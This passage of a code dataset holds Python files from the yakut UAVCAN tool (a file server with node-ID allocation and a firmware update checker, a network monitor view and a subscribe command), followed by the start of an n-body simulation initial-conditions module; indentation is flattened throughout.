_logger.info("Transport module %r is not available because: %r", name, ex)
```
#### File: cmd/file_server/_cmd.py
```python
from __future__ import annotations
import asyncio
from typing import Optional, Iterable, List, Tuple, TYPE_CHECKING
from pathlib import Path
import click
import pyuavcan
import yakut
from . import AppDescriptor
if TYPE_CHECKING:
import pyuavcan.application # pylint: disable=ungrouped-imports
import pyuavcan.application.file # pylint: disable=ungrouped-imports
_logger = yakut.get_logger(__name__)
def _validate_root_directory(ctx: click.Context, param: click.Parameter, value: Iterable[str]) -> List[Path]:
_ = param
out: List[Path] = []
for x in value:
p = Path(x).resolve()
if not p.is_dir() or not p.exists():
raise click.UsageError(f"The specified root is not a valid directory: {x!r}", ctx=ctx)
out.append(p)
if not out:
out.append(Path.cwd().resolve()) # This is the default.
_logger.info("File server root directories: %r", list(map(str, out)))
return out
@yakut.subcommand()
@click.argument(
"roots",
metavar="PATH",
type=click.Path(exists=True, file_okay=False, resolve_path=True, path_type=str),
callback=_validate_root_directory,
nargs=-1,
)
@click.option(
"--plug-and-play",
"-P",
metavar="FILE",
type=click.Path(dir_okay=False, resolve_path=True, path_type=str),
help=f"""
Run a centralized plug-and-play (PnP) node-ID allocator alongside the file server.
The file path points to the allocation table; if missing, a new file will be created.
The PnP allocator will be tracking the status of nodes and requesting uavcan.node.GetInfo automatically.
Low-level implementation details are available in the documentation for pyuavcan.application.plug_and_play
at https://pyuavcan.readthedocs.io.
""",
)
@click.option(
"--update-software/--no-update-software",
"+U/-U",
default=False,
show_default=True,
help=f"""
Check if all online nodes are running up-to-date software; request update if not.
The software version is determined by invoking uavcan.node.GetInfo for every node that is online or
became online (or restarted).
When a node responds to uavcan.node.GetInfo, the root directory of the file server is scanned for software packages
that are suitable for the node.
If the node is already executing one of the available software packages or no suitable packages are found,
no further action is taken, as it is considered to be up-to-date.
Otherwise, if it is determined that the node should be updated, a standard software update request
of type uavcan.node.ExecuteCommand with COMMAND_BEGIN_SOFTWARE_UPDATE is sent.
To be considered by the server, node software packages shall reside in one of the root directories and
be named following this pattern:
\b
NAME-HWMAJ.HWMIN-SWMAJ.SWMIN.VCS.CRC.app*
|____| |__|
|__________| |______|
either major or both either CRC or both
can be omitted if CRC and VCS can be
multiple hardware omitted
versions supported
The values are sourced from uavcan.node.GetInfo, and they are as follows:
NAME -- The name of the node; e.g., "com.zubax.telega".
HWMAJ, HWMIN -- Hardware version numbers.
The minor number or both of them can be omitted iff the package is compatible with multiple hardware revisions.
SWMAJ, SWMIN -- Software version numbers.
VCS, CRC --
The version control system (VCS) revision ID (e.g., git commit hash) and the CRC of the software package.
Both are hexadecimal numbers and both are optional: either the CRC alone or both VCS-hash and CRC can be omitted.
The fields are terminated by a literal string ".app",
which can be followed by arbitrary additional metadata (like a file extension).
Examples of compliant names:
\b
com.zubax.telega-1.2-0.3.68620b82.28df0c432c2718cd.app.bin
com.zubax.telega-0.3.app.zip
A node running software version X (as determined from uavcan.node.GetInfo)
is considered to require an update to Y (a local package file) if
the names are matching, the hardware version is compatible, and either condition holds:
- The software image CRC is defined for both X and Y and is different.
- The software version of Y is higher than X.
- The software version of Y is not older than X and the VCS hash is different.
- There may be additional heuristics to handle edge cases. Inspect logs or use --verbose to see details.
""",
)
@yakut.pass_purser
def file_server(purser: yakut.Purser, roots: List[Path], plug_and_play: Optional[str], update_software: bool) -> None:
"""
Run a standard UAVCAN file server; optionally run a plug-and-play node-ID allocator and software updater.
The command takes a list of root directories for the file server.
If none are given, the current working directory will be used as the only root.
If more than one root is given, they all will be visible via UAVCAN as a single unified directory;
the first directory takes precedence in case of conflicting entries.
Examples:
\b
yakut file-server --plug-and-play=allocation_table.db --update-software
"""
try:
from pyuavcan.application import NodeInfo
from pyuavcan.application.file import FileServer
from pyuavcan.application.node_tracker import NodeTracker, Entry
from uavcan.node import ExecuteCommand_1_1 as ExecuteCommand
from uavcan.node import Heartbeat_1_0 as Heartbeat
except ImportError as ex:
from yakut.cmd.compile import make_usage_suggestion
raise click.UsageError(make_usage_suggestion(ex.name))
with purser.get_node("file_server", allow_anonymous=False) as node:
node_tracker: Optional[NodeTracker] = None # Initialized lazily only if needed.
def get_node_tracker() -> NodeTracker:
nonlocal node_tracker
if node_tracker is None:
_logger.info("Initializing the node tracker")
node_tracker = NodeTracker(node)
return node_tracker
if plug_and_play:
_logger.info("Starting a plug-and-play allocator using file %r", plug_and_play)
from pyuavcan.application.plug_and_play import CentralizedAllocator
alloc = CentralizedAllocator(node, plug_and_play)
# The allocator requires integration with the node tracker, as explained in the docs.
def register_node(node_id: int, _old_entry: Optional[Entry], entry: Optional[Entry]) -> None:
if entry:
_logger.info("Node %r most recent heartbeat: %s", node_id, entry.heartbeat)
_logger.info("Node %r info: %s", node_id, entry.info or "<not available>")
else:
_logger.info("Node %r went offline", node_id)
unique_id = entry.info.unique_id.tobytes() if entry and entry.info else None
alloc.register_node(node_id, unique_id)
get_node_tracker().add_update_handler(register_node)
fs = FileServer(node, roots)
def check_software_update(node_id: int, _old_entry: Optional[Entry], entry: Optional[Entry]) -> None:
if entry is None or entry.info is None:
_logger.debug("Info for node %r is not (yet) available, cannot check software version", node_id)
return
heartbeat = entry.heartbeat
assert isinstance(heartbeat, Heartbeat)
if heartbeat.mode.value == heartbeat.mode.SOFTWARE_UPDATE:
_logger.info("Node %r is in the software update mode already: %r", node_id, heartbeat)
return
_logger.info("Checking if node %r requires a software update...", node_id)
info = entry.info
assert isinstance(info, NodeInfo)
package = _locate_package(fs, info)
if package:
_local_root_is_irrelevant, remote_visible_path = package
cmd_request = ExecuteCommand.Request(
ExecuteCommand.Request.COMMAND_BEGIN_SOFTWARE_UPDATE,
str(remote_visible_path),
)
_logger.warning("Requesting node %r to update its software: %r", node_id, cmd_request)
cmd_client = node.make_client(ExecuteCommand, node_id)
cmd_client.priority = pyuavcan.transport.Priority.SLOW
cmd_client.response_timeout = 5.0
async def do_call() -> None:
result = await cmd_client.call(cmd_request)
if result is None:
_logger.error(
"Node %r did not respond to software update command %r in %.1f seconds",
node_id,
cmd_request,
cmd_client.response_timeout,
)
return
response, _ = result
assert isinstance(response, ExecuteCommand.Response)
if response.status != 0:
_logger.error(
"Node %r responded to software update command %r with error %r",
node_id,
cmd_request,
response.status,
)
return
_logger.info("Node %r confirmed software update command %r", node_id, cmd_request)
node.loop.create_task(do_call())
else:
_logger.info("Node %r does not require a software update.", node_id)
if update_software:
_logger.info("Initializing the software update checker")
# The check should be run in a separate thread because on a system with slow/busy disk IO this may cause
# the file server to slow down significantly because the event loop would be blocked here on disk reads.
get_node_tracker().add_update_handler(check_software_update)
asyncio.get_event_loop().run_forever()
def _locate_package(
fs: pyuavcan.application.file.FileServer,
info: pyuavcan.application.NodeInfo,
) -> Optional[Tuple[Path, Path]]:
"""
If at least one locally available application file is equivalent to the already running application,
no update will take place.
This is to support the case where the network may contain nodes running several different versions
of the application.
Also, without this capability, if the lookup roots contained more than one application package for a
given node, they would be continuously replacing one another.
"""
app = AppDescriptor.from_node_info(info)
result: Optional[Tuple[Path, Path]] = None
for root, tail in fs.glob(app.make_glob_expression()):
candidate = AppDescriptor.from_file_name(str(tail.name))
if candidate:
if app.is_equivalent(candidate):
return None
if app.should_update_to(candidate):
result = root, tail
return result
```
#### File: cmd/monitor/_view.py
```python
from __future__ import annotations
import sys
import functools
from typing import TYPE_CHECKING, Optional, Dict, Callable, List, Any, Set, AbstractSet, Tuple, TypeVar
from collections import defaultdict
import pyuavcan
import yakut
from ._model import N_NODES, N_SUBJECTS, N_SERVICES, NodeState
from ._ui import Style, Color, Canvas, TableRenderer
if TYPE_CHECKING:
from numpy import matrix
from scipy.sparse import spmatrix
import uavcan.node
S_DEFAULT = Style(fg=Color.WHITE, salience=1)
S_FAILURE = Style(fg=Color.WHITE, bg=Color.RED, salience=2)
S_MUTED = Style(salience=-1)
S_ADVISORY = Style(fg=Color.MAGENTA, salience=1)
S_CAUTION = Style(fg=Color.YELLOW, salience=1)
S_WARNING = Style(fg=Color.RED, salience=1)
S_NOTICE = Style(fg=Color.CYAN, salience=1)
S_NICE = Style(fg=Color.GREEN, bg=Color.BLACK, salience=1)
S_POOR = Style(fg=Color.YELLOW, bg=Color.BLACK, salience=1)
class View:
_CONNECTIVITY_MATRIX_CELL_WIDTH = 5
def __init__(self) -> None:
self._fragments: List[str] = []
self._node_table_renderer = TableRenderer(map(len, View._NODE_TABLE_HEADER), separate_columns=True)
self._connectivity_matrix_renderer = TableRenderer(
(View._CONNECTIVITY_MATRIX_CELL_WIDTH for _ in range(N_NODES + 1)),
separate_columns=False,
)
legend_canvas = Canvas()
row = 0
col = legend_canvas.put(row, 0, "APPLICATION LAYER CONNECTIVITY MATRIX [t/s=transfer/second] Colors: ")
col = legend_canvas.put(
row, col, "pub/cln", style=get_matrix_cell_style(tx=True, rx=False, recently_active=False)
)
col = legend_canvas.put(row, col, "│")
col = legend_canvas.put(
row, col, "sub/srv", style=get_matrix_cell_style(tx=False, rx=True, recently_active=False)
)
col = legend_canvas.put(row, col, "│")
col = legend_canvas.put(
row,
col,
"(pub+sub)/(cln+srv)",
style=get_matrix_cell_style(tx=True, rx=True, recently_active=False),
)
col = legend_canvas.put(row, col, "│")
col = legend_canvas.put(
row, col, "activity", style=get_matrix_cell_style(tx=False, rx=False, recently_active=True)
)
col = legend_canvas.put(row, col, "│uavcan.node.port.List is ")
col = legend_canvas.put(row, col, "published", style=S_NICE)
col = legend_canvas.put(row, col, "/")
col = legend_canvas.put(row, col, "not", style=S_POOR)
legend_canvas.put(row, col, "│")
self._connectivity_matrix_legend = legend_canvas.flip_buffer()
def flip_buffer(self) -> str:
out = "\n".join(self._fragments)
self._fragments = []
return out
def render(
self,
states: Dict[Optional[int], NodeState],
xfer_deltas: spmatrix,
xfer_rates: spmatrix,
byte_rates: spmatrix,
total_transport_errors: int,
fir_window_duration: float,
) -> None:
self._fragments.append(self._render_node_table(states))
self._fragments.append(self._connectivity_matrix_legend)
self._fragments.append(self._render_connectivity_matrix(states, xfer_deltas, xfer_rates, byte_rates))
annotation_canvas = Canvas()
col = annotation_canvas.put(0, 0, "Total transport layer errors:")
col = annotation_canvas.put(
0,
col,
f"{total_transport_errors:9d}",
style=S_POOR if total_transport_errors > 0 else S_NICE,
)
col += 9
col = annotation_canvas.put(0, col, f"Values averaged over {fir_window_duration:.1f} sec")
_ = col
self._fragments.append(annotation_canvas.flip_buffer())
# noinspection SpellCheckingInspection
_NODE_TABLE_HEADER = [
"NodID",
"Mode",
"Health",
"VSSC",
"Uptime".ljust(14),
"VProtcl",
"VHardwr",
"VSoftware(major.minor.vcs.crc)".ljust(41),
"Unique-ID".ljust(32),
"Name",
]
def _render_node_table(self, states: Dict[Optional[int], NodeState]) -> str:
for idx, s in enumerate(View._NODE_TABLE_HEADER):
self._node_table_renderer[0, idx] = s
for idx, (node_id, ss) in enumerate(states.items()):
col = 0
def put(data: Any, style: Optional[Style]) -> None:
nonlocal col
self._node_table_renderer[idx + 1, col] = data, (style or S_DEFAULT)
col += 1
if node_id is not None:
if not ss.online:
put(node_id, S_MUTED)
else:
put(node_id, None)
else:
put("anon", None if ss.online else S_MUTED)
if ss.heartbeat:
if node_id is None and ss.online:
sty_override: Optional[Style] = S_FAILURE # Anonymous nodes shall not publish heartbeat.
elif not ss.online:
sty_override = S_MUTED
else:
sty_override = None
txt, sty = render_mode(ss.heartbeat.mode)
put(txt, sty_override or sty)
txt, sty = render_health(ss.heartbeat.health)
put(txt, sty_override or sty)
put(ss.heartbeat.vendor_specific_status_code, sty_override)
else:
put("?", S_MUTED)
put("?", S_MUTED)
put("?", S_MUTED)
if ss.online:
if ss.heartbeat is None:
if node_id is not None:
put("zombie", S_FAILURE)
else:
put("online", None)
else:
put(render_uptime(ss.heartbeat.uptime), None)
else:
put("offline", S_MUTED)
if ss.info:
sty = None if ss.online and ss.heartbeat else S_MUTED
put(
render_version(ss.info.protocol_version),
sty if ss.info.protocol_version.major == pyuavcan.UAVCAN_SPECIFICATION_VERSION[0] else S_FAILURE,
)
put(render_version(ss.info.hardware_version), sty)
put(
render_full_software_version(
ss.info.software_version,
ss.info.software_vcs_revision_id,
int(ss.info.software_image_crc[0]) if len(ss.info.software_image_crc) > 0 else None,
),
sty,
)
put(ss.info.unique_id.tobytes().hex(), sty)
# Best effort to display bad names
put("".join(ss.info.name.tobytes().decode(errors="ignore").split()), sty)
else:
for _ in range(5):
put("?", S_MUTED)
return self._node_table_renderer.flip_buffer()
# noinspection SpellCheckingInspection
def _render_connectivity_matrix(
self,
states: Dict[Optional[int], NodeState],
xfer_delta: spmatrix,
xfer_rates: spmatrix,
byte_rates: spmatrix,
) -> str:
tbl = self._connectivity_matrix_renderer
online_states: Dict[Optional[int], NodeState] = {k: v for k, v in states.items() if v.online}
# This part took some time to get right to avoid accidental dense matrix operations, which are super slow.
xfer_rates_by_ds = xfer_rates.sum(axis=0)
assert xfer_rates_by_ds.size == N_SUBJECTS + N_SERVICES * 2
xfer_delta_by_ds = xfer_delta.sum(axis=0)
byte_rates_by_ds = byte_rates.sum(axis=0)
# Consider a port existing if either holds:
# - there have been recent transfers, even if the source nodes have gone offline
# - if the port was recently reported via uavcan.node.port.List, even if the node is currently offline
all_subjects: Set[int] = set()
all_services: Set[int] = set()
for y in xfer_rates_by_ds.nonzero()[1]:
y = int(y)
if y < N_SUBJECTS:
all_subjects.add(y)
else:
all_services.add((y - N_SUBJECTS) % N_SERVICES)
for node_id, state in states.items():
if state.ports is not None:
all_subjects |= state.ports.pub
# Subjects that are only subscribed to by supersubscribers are only shown if there are other nodes
# utilizing these.
if len(state.ports.sub) < N_SUBJECTS:
all_subjects |= state.ports.sub
all_services |= state.ports.cln
all_services |= state.ports.srv
# HEADER ROWS AND COLUMNS
num_nodes = len(online_states)
num_subjects = len(all_subjects)
num_services = len(all_services)
row_subject = 0
row_service = row_subject + num_subjects + 3
row_total = row_service + num_services + 3
tbl[row_subject, 0] = "MESSG", S_MUTED
tbl[row_service, 0] = "RQ+RS", S_MUTED
tbl[row_total, 0] = "TOTAL", S_MUTED
for row in (row_subject + num_subjects + 1, row_service + num_services + 1):
tbl[row + 0, num_nodes + 3] = "↖ t/s", S_MUTED
tbl[row + 1, num_nodes + 3] = "", S_MUTED
for row in (row_subject, row_service, row_total): # Row of node-IDs and per-port totals.
for ii, (node_id, state) in enumerate(online_states.items()):
sty = S_POOR if state.ports is None else S_NICE
if node_id is not None:
tbl[row, ii + 1] = node_id, sty
else:
tbl[row, ii + 1] = " anon", sty
tbl[row, num_nodes + 1] = " ∑t/s"
tbl[row, num_nodes + 2] = " ∑B/s"
for row in (row_subject + num_subjects, row_service + num_services, row_total): # Per-node totals.
tbl[row + 1, 0] = "∑t/s"
tbl[row + 2, 0] = "∑B/s"
for ii, sid in enumerate(sorted(all_subjects)): # Subject-ID and Service-ID.
for col in (0, num_nodes + 3):
tbl[row_subject + ii + 1, col] = sid, S_DEFAULT
for ii, sid in enumerate(sorted(all_services)):
for col in (0, num_nodes + 3):
tbl[row_service + ii + 1, col] = sid, S_DEFAULT
# CONTENTS
View._render_subject_matrix_contents(
lambda row, col, data, style: tbl.set_cell(row + row_subject + 1, col + 1, data, style=style),
states=online_states,
subjects=all_subjects,
xfer_delta=xfer_delta,
xfer_rates=xfer_rates,
byte_rates=byte_rates,
xfer_delta_by_port=xfer_delta_by_ds,
xfer_rates_by_port=xfer_rates_by_ds,
byte_rates_by_port=byte_rates_by_ds,
)
def slice_req_rsp(m: _T) -> Tuple[_T, _T]:
a = N_SUBJECTS + N_SERVICES * 0
b = N_SUBJECTS + N_SERVICES * 1
c = N_SUBJECTS + N_SERVICES * 2
return (m[:, a:b], m[:, b:c]) # type: ignore
View._render_service_matrix_contents(
lambda row, col, data, style: tbl.set_cell(row + row_service + 1, col + 1, data, style=style),
states=online_states,
services=all_services,
xfer_delta=slice_req_rsp(xfer_delta),
xfer_rates=slice_req_rsp(xfer_rates),
byte_rates=slice_req_rsp(byte_rates),
xfer_delta_by_port=slice_req_rsp(xfer_delta_by_ds),
xfer_rates_by_port=slice_req_rsp(xfer_rates_by_ds),
byte_rates_by_port=slice_req_rsp(byte_rates_by_ds),
)
# TOTAL DATA RATE
xfer_delta_by_node = xfer_delta.sum(axis=1)
xfer_rates_by_node = xfer_rates.sum(axis=1)
byte_rates_by_node = byte_rates.sum(axis=1)
for ii, node_id in enumerate(online_states):
x = node_id if node_id is not None else N_NODES
sty = get_matrix_cell_style(None, None, int(xfer_delta_by_node[x]) > 0)
tbl[row_total + 1, ii + 1] = render_xfer_rate(float(xfer_rates_by_node[x])), sty
tbl[row_total + 2, ii + 1] = render_xfer_rate(float(byte_rates_by_node[x])), sty
# Sum the DS-wise vectors because they are usually faster due to being smaller.
sty = get_matrix_cell_style(None, None, int(xfer_delta_by_ds.sum()) > 0)
tbl[row_total + 1, num_nodes + 1] = render_xfer_rate(float(xfer_rates_by_ds.sum())), sty
tbl[row_total + 2, num_nodes + 2] = render_byte_rate(float(byte_rates_by_ds.sum())), sty
tbl[row_total + 1, num_nodes + 3] = ""
tbl[row_total + 2, num_nodes + 3] = ""
return tbl.flip_buffer()
@staticmethod
def _render_subject_matrix_contents(
put: Callable[[int, int, Any, Style], None],
states: Dict[Optional[int], NodeState],
subjects: AbstractSet[int],
xfer_delta: spmatrix,
xfer_rates: spmatrix,
byte_rates: spmatrix,
xfer_delta_by_port: matrix,
xfer_rates_by_port: matrix,
byte_rates_by_port: matrix,
) -> None:
recent_by_node: Dict[Optional[int], bool] = defaultdict(bool)
xfer_rate_by_node: Dict[Optional[int], float] = defaultdict(float)
byte_rate_by_node: Dict[Optional[int], float] = defaultdict(float)
for row, subject_id in enumerate(sorted(subjects)):
for col, (node_id, state) in enumerate(states.items()):
x = node_id if node_id is not None else N_NODES
recent = int(xfer_delta[x, subject_id]) > 0
rate = float(xfer_rates[x, subject_id])
if state.ports is not None:
pub = subject_id in state.ports.pub
sub = subject_id in state.ports.sub
sty = get_matrix_cell_style(pub, sub, recent)
text = render_xfer_rate(rate) if pub or (rate > EPSILON) else ""
else:
sty = get_matrix_cell_style(None, None, recent)
text = render_xfer_rate(rate) if rate > EPSILON else ""
put(row, col, text, sty)
recent_by_node[node_id] |= recent
xfer_rate_by_node[node_id] += rate
byte_rate_by_node[node_id] += byte_rates[x, subject_id]
recent = xfer_delta_by_port[0, subject_id] > 0
sty = get_matrix_cell_style(None, None, recent)
put(row, len(states) + 0, render_xfer_rate(xfer_rates_by_port[0, subject_id]), sty)
put(row, len(states) + 1, render_byte_rate(byte_rates_by_port[0, subject_id]), sty)
row = len(subjects)
for col, node_id in enumerate(states):
sty = get_matrix_cell_style(None, None, recent_by_node[node_id])
put(row + 0, col, render_xfer_rate(xfer_rate_by_node[node_id]), sty)
put(row + 1, col, render_byte_rate(byte_rate_by_node[node_id]), sty)
sty = get_matrix_cell_style(None, None, sum(recent_by_node.values()) > 0)
put(row + 0, len(states) + 0, render_xfer_rate(sum(xfer_rate_by_node.values())), sty)
put(row + 1, len(states) + 1, render_byte_rate(sum(byte_rate_by_node.values())), sty)
@staticmethod
def _render_service_matrix_contents(
put: Callable[[int, int, Any, Style], None],
states: Dict[Optional[int], NodeState],
services: AbstractSet[int],
xfer_delta: Tuple[spmatrix, spmatrix],
xfer_rates: Tuple[spmatrix, spmatrix],
byte_rates: Tuple[spmatrix, spmatrix],
xfer_delta_by_port: Tuple[matrix, matrix],
xfer_rates_by_port: Tuple[matrix, matrix],
byte_rates_by_port: Tuple[matrix, matrix],
) -> None:
# We used to display two rows per service: separate request and response. It is very informative but a bit
# expensive in terms of the screen space, which is very limited when large networks are involved.
# So while the data provided to this method is sufficient to build a super-detailed representation,
# currently we collapse it into one service per row such that request and response states are joined together.
# We may change it later shall the need arise.
xfer_delta_uni: spmatrix = sum(xfer_delta)
byte_rates_uni: spmatrix = sum(byte_rates)
xfer_delta_by_port_uni: matrix = sum(xfer_delta_by_port)
xfer_rates_by_port_uni: matrix = sum(xfer_rates_by_port)
byte_rates_by_port_uni: matrix = sum(byte_rates_by_port)
recent_by_node: Dict[Optional[int], bool] = defaultdict(bool)
xfer_rate_by_node: Dict[Optional[int], float] = defaultdict(float)
byte_rate_by_node: Dict[Optional[int], float] = defaultdict(float)
for row, service_id in enumerate(sorted(services)):
for col, (node_id, state) in enumerate(states.items()):
x = node_id if node_id is not None else N_NODES
recent = int(xfer_delta_uni[x, service_id]) > 0
rate_req = float(xfer_rates[0][x, service_id])
rate_rsp = float(xfer_rates[1][x, service_id])
rate_total = rate_req + rate_rsp
if state.ports is not None:
cln = service_id in state.ports.cln
srv = service_id in state.ports.srv
sty = get_matrix_cell_style(tx=cln, rx=srv, recently_active=recent)
text = render_xfer_rate(rate_total) if cln or srv or (rate_total > EPSILON) else ""
else:
sty = get_matrix_cell_style(None, None, recent)
text = render_xfer_rate(rate_total) if rate_total > EPSILON else ""
put(row, col, text, sty)
recent_by_node[node_id] |= recent
xfer_rate_by_node[node_id] += rate_total
byte_rate_by_node[node_id] += byte_rates_uni[x, service_id]
recent = int(xfer_delta_by_port_uni[0, service_id]) > 0
sty = get_matrix_cell_style(None, None, recent)
put(row, len(states) + 0, render_xfer_rate(xfer_rates_by_port_uni[0, service_id]), sty)
put(row, len(states) + 1, render_byte_rate(byte_rates_by_port_uni[0, service_id]), sty)
total_recent = False
total_xfer_rate = 0.0
total_byte_rate = 0.0
row = len(services)
for col, node_id in enumerate(states):
recent = recent_by_node[node_id] > 0
xfer_rate = xfer_rate_by_node[node_id]
byte_rate = byte_rate_by_node[node_id]
total_recent = total_recent or recent
total_xfer_rate += xfer_rate
total_byte_rate += byte_rate
sty = get_matrix_cell_style(None, None, recent)
put(row + 0, col, render_xfer_rate(xfer_rate), sty)
put(row + 1, col, render_byte_rate(byte_rate), sty)
sty = get_matrix_cell_style(None, None, total_recent)
put(row + 0, len(states) + 0, render_xfer_rate(total_xfer_rate), sty)
put(row + 1, len(states) + 1, render_byte_rate(total_byte_rate), sty)
@functools.lru_cache(None)
def get_matrix_cell_style(tx: Optional[bool], rx: Optional[bool], recently_active: bool) -> Style:
salience = 1 if recently_active else -1
fg = Color.RED if recently_active else Color.WHITE
if tx and rx:
return Style(fg=fg, bg=Color.CYAN, salience=salience)
if tx:
return Style(fg=fg, bg=Color.BLUE, salience=salience)
if rx:
return Style(fg=fg, bg=Color.GREEN, salience=salience)
return Style(fg=fg, bg=Color.BLACK, salience=salience)
# noinspection SpellCheckingInspection
def render_mode(val: uavcan.node.Mode_1_0) -> Tuple[str, Optional[Style]]:
if val.value == val.OPERATIONAL:
return "oper", None
if val.value == val.INITIALIZATION:
return "init", S_NOTICE
if val.value == val.MAINTENANCE:
return "mntn", S_ADVISORY
if val.value == val.SOFTWARE_UPDATE:
return "swup", S_CAUTION
return str(val.value), S_FAILURE # pragma: no cover
# noinspection SpellCheckingInspection
def render_health(val: uavcan.node.Health_1_0) -> Tuple[str, Optional[Style]]:
if val.value == val.NOMINAL:
return "nomina", None
if val.value == val.ADVISORY:
return "adviso", S_ADVISORY
if val.value == val.CAUTION:
return "cautio", S_CAUTION
if val.value == val.WARNING:
return "warnin", S_WARNING
return str(val.value), S_FAILURE # pragma: no cover
def render_uptime(val: int) -> str:
return f"{val // (3600 * 24):5d}d{(val // 3600) % 24:02d}:{(val // 60) % 60:02d}:{val % 60:02d}"
def render_version(val: uavcan.node.Version_1_0) -> str:
return "% 3d.%-3d" % (val.major, val.minor)
def render_full_software_version(version: uavcan.node.Version_1_0, vcs_revision_id: int, crc: Optional[int]) -> str:
out = f"{version.major:3d}.{version.minor}"
if vcs_revision_id != 0 or crc is not None:
out += f".{vcs_revision_id:016x}"
if crc is not None:
out += f".{crc:016x}"
return out.ljust(41)
def render_xfer_rate(x: float) -> str:
x = max(x, 0.0) # The value may be slightly negative due to accumulated floating point error
if x < 1e3:
return f"{x:4.0f} "
if x < 1e6:
return f"{x / 1e3:4.0f}k"
return f"{x / 1e6:4.0f}M"
def render_byte_rate(x: float) -> str:
x = max(x, 0.0) # The value may be slightly negative due to accumulated floating point error
if x < 1024:
return f"{x:4.0f} "
if x < 1024 * 1024:
return f"{x / 1024:4.0f}K"
return f"{x / (1024 * 1024):4.0f}M"
EPSILON = sys.float_info.epsilon
_T = TypeVar("_T")
_logger = yakut.get_logger(__name__)
```
#### File: yakut/cmd/subscribe.py
```python
import sys
import typing
import logging
import contextlib
import click
import pyuavcan
from pyuavcan.presentation import Presentation, Subscriber
import yakut
from yakut.param.formatter import Formatter
from yakut.util import convert_transfer_metadata_to_builtin, construct_port_id_and_type
_M = typing.TypeVar("_M", bound=pyuavcan.dsdl.CompositeObject)
_logger = yakut.get_logger(__name__)
@yakut.subcommand()
@click.argument("subject", type=str, nargs=-1)
@click.option(
"--with-metadata/--no-metadata",
"+M/-M",
default=True,
show_default=True,
help="When enabled, each message object is prepended with an extra field named `_metadata_`.",
)
@click.option(
"--count",
"-N",
type=int,
metavar="CARDINAL",
help=f"""
Exit automatically after this many messages (or synchronous message groups) have been received. No limit by default.
""",
)
@yakut.pass_purser
def subscribe(
purser: yakut.Purser,
subject: typing.Tuple[str, ...],
with_metadata: bool,
count: typing.Optional[int],
) -> None:
"""
Subscribe to specified subjects and print messages into stdout.
This command does not instantiate a local node and does not disturb the network in any way,
so many instances can be cheaply executed concurrently.
It is recommended to use anonymous transport (i.e., without a node-ID).
The arguments are a list of message data type names prepended with the subject-ID;
the subject-ID may be omitted if the data type defines a fixed one:
\b
[SUBJECT_ID:]TYPE_NAME.MAJOR.MINOR
If multiple subjects are specified, a synchronous subscription will be used.
It is useful for subscribing to a group of coupled subjects like lockstep sensor feeds,
but it will not work for subjects that are temporally unrelated or published at different rates.
Each object emitted into stdout is a key-value mapping where the number of elements equals the number
of subjects the command is asked to subscribe to;
the keys are subject-IDs and values are the received message objects.
In data type names forward or backward slashes can be used instead of ".";
version numbers can be also separated using underscores.
This is done to allow the user to rely on filesystem autocompletion when typing the command.
Examples:
\b
yakut sub 33:uavcan.si.unit.angle.Scalar.1.0 --no-metadata
"""
_logger.debug("subject=%r, with_metadata=%r, count=%r", subject, with_metadata, count)
if not subject:
_logger.info("Nothing to do because no subjects are specified")
return
if count is not None and count <= 0:
_logger.info("Nothing to do because count=%s", count)
return
count = count if count is not None else sys.maxsize
formatter = purser.make_formatter()
transport = purser.get_transport()
if transport.local_node_id is not None:
_logger.info("It is recommended to use an anonymous transport with this command.")
with contextlib.closing(Presentation(transport)) as presentation:
subscriber = _make_subscriber(subject, presentation)
try:
_run(subscriber, formatter, with_metadata=with_metadata, count=count)
finally:
if _logger.isEnabledFor(logging.INFO):
_logger.info("%s", presentation.transport.sample_statistics())
_logger.info("%s", subscriber.sample_statistics())
def _make_subscriber(subjects: typing.Sequence[str], presentation: Presentation) -> Subscriber[_M]:
group = [construct_port_id_and_type(ds) for ds in subjects]
assert len(group) > 0
if len(group) == 1:
((subject_id, dtype),) = group
return presentation.make_subscriber(dtype, subject_id)
raise NotImplementedError(
"Multi-subject subscription is not yet implemented. See https://github.com/UAVCAN/pyuavcan/issues/65"
)
@yakut.asynchronous
async def _run(subscriber: Subscriber[_M], formatter: Formatter, with_metadata: bool, count: int) -> None:
async for msg, transfer in subscriber:
assert isinstance(transfer, pyuavcan.transport.TransferFrom)
outer: typing.Dict[int, typing.Dict[str, typing.Any]] = {}
bi: typing.Dict[str, typing.Any] = {} # We use updates to ensure proper dict ordering: metadata before data
if with_metadata:
bi.update(convert_transfer_metadata_to_builtin(transfer))
bi.update(pyuavcan.dsdl.to_builtin(msg))
outer[subscriber.port_id] = bi
print(formatter(outer))
count -= 1
if count <= 0:
_logger.debug("Reached the specified message count, stopping")
break
```
|
{
"source": "jeypiti/n-body-sim",
"score": 3
}
|
#### File: n-body-sim/src/init_cond.py
```python
import numpy as np
__author__ = "jeypiti"
__copyright__ = "Copyright 2022, jeypiti"
__credits__ = ["jeypiti"]
__license__ = "MIT"
solar = 1.9885e30
mercury = 3.3011e23
venus = 4.8675e24
earth = 5.97237e24
mars = 6.4171e23
jupiter = 1.8982e27
saturn = 5.6834e26
neptune = 1.02413e26
uranus = 8.6810e25
pluto = 1.303e22
def generate_planetary_system(bodies, max_mass=1e-3, seed=None):
"""
Randomly generates initial conditions for a planetary system. Depending on
the exact starting positions, numerical errors in the simulation may lead
to problems, e.g. bodies being ejected from the system. The chance of this
happening increases with the number of bodies in the system.
The system will be spinning anticlockwise.
:param bodies: Number of bodies in the system.
:param max_mass: Maximum mass of the outer bodies. The central body has mass 1.
:param seed: Seed for the pseudorandom number generator.
:return: Vales for (n,) masses, (n, 2) positions, and (n, 2) velocities.
"""
rng = np.random.default_rng(seed)
masses = rng.uniform(0, max_mass, (bodies,))
# generate polar coordinates & convert to cartesian
theta = rng.uniform(0, 2 * np.pi, (bodies,))
r = rng.gamma(7.5, 1, (bodies,)) * bodies ** 0.8
pos = np.vstack((r * np.cos(theta), r * np.sin(theta))).T
# calculate magnitude of velocity under the approximation of a two-body system
v = np.sqrt(1 / r)
vel = np.vstack((-v * np.sin(theta), v * np.cos(theta))).T
# overwrite first body with heavy central mass
masses[0] = 1
pos[0, :] = vel[0, :] = 0
return masses, pos, vel
# modeled after our solar system
solar_system = (
np.array((solar, mercury, venus, earth, mars, jupiter, saturn, uranus, pluto)) / solar,
np.array(
(
(0, 0),
(0, 1.29),
(0, -2.4),
(-2.35, 2.35),
(3.58, -3.58),
(12.21, 12.21),
(-22.44, -22.44),
(-45.07, 45.07),
(99.03, 13.92),
)
),
np.array(
(
(0, 0),
(0.88, 0),
(-0.645, 0),
(0.388, 0.388),
(-0.314, -0.314),
(0.17, -0.17),
(-0.125, 0.125),
